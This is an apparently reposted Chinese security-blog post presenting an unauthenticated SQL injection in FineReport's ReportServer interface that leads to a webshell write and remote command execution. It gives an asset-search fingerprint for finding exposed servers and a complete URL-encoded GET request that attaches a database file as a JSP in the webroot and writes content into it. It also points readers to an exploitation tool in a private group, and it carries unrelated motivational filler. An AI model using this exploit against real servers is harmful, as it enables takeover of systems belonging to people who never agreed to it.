帆软FineReport报表 ReportServer SQL注入getshell

admin 2024年7月29日16:41:08评论161 views字数 955阅读3分11秒阅读模式

漏洞描述

帆软软件有限公司FineReport存在SQL注入漏洞,该漏洞是由于/view/ReportServer接口存在未授权sql注入,攻击者可利用该漏洞利用sql注入写入文件,造成远程命令执行,控制目标服务器。

网络测绘

app="帆软-数据决策系统"

帆软FineReport报表 ReportServer SQL注入getshell

漏洞poc

GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fuu9iu.jsp%27%20as%20uu9iu%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20uu9iu.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20uu9iu.exp2%28data%29%20VALUES%20%28%27Qax360nb%27%29%3B'),1,1)} HTTP/1.1

漏洞检测与利用

帆软FineReport报表 ReportServer SQL注入getshell

帆软FineReport报表 ReportServer SQL注入getshell

工具获取

帆软漏洞检测与利用工具已上传内部圈子,可扫码加入获取。

帆软FineReport报表 ReportServer SQL注入getshell

帆软FineReport报表 ReportServer SQL注入getshell

🍻🍻🍻
🍻🍻🍻

不要等待机会,而要创造机会。每一个不曾起舞的日子,都是对生命的辜负。成功不是终点,失败也并非末日,最重要的是继续前进的勇气。不忘初心,方得始终。即使前方是迷雾重重,也要勇敢向前,因为阳光总在风雨后。今天的努力,是为了让明天的你感谢现在的自己。人生没有白走的路,每一步都算数。梦想不会逃跑,逃跑的永远是自己。生活不会辜负每一个努力的人,时间会告诉我们一切。心中有梦,眼中有光,脚下有路,未来可期。失败只是向成功迈出的第一步,不要因为怕摔倒而停下脚步。每一天都是新的开始,每一个今天都是最好的礼物。世界上只有一种真正的英雄主义,那就是认清生活的真相后依然热爱生活。人生最美的风景,永远在路上。用心走过的每一步,都是生命的馈赠。

原文始发于微信公众号(南街老友):帆软FineReport报表 ReportServer SQL注入getshell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月29日16:41:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   帆软FineReport报表 ReportServer SQL注入getshellhttps://cn-sec.com/archives/3008988.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息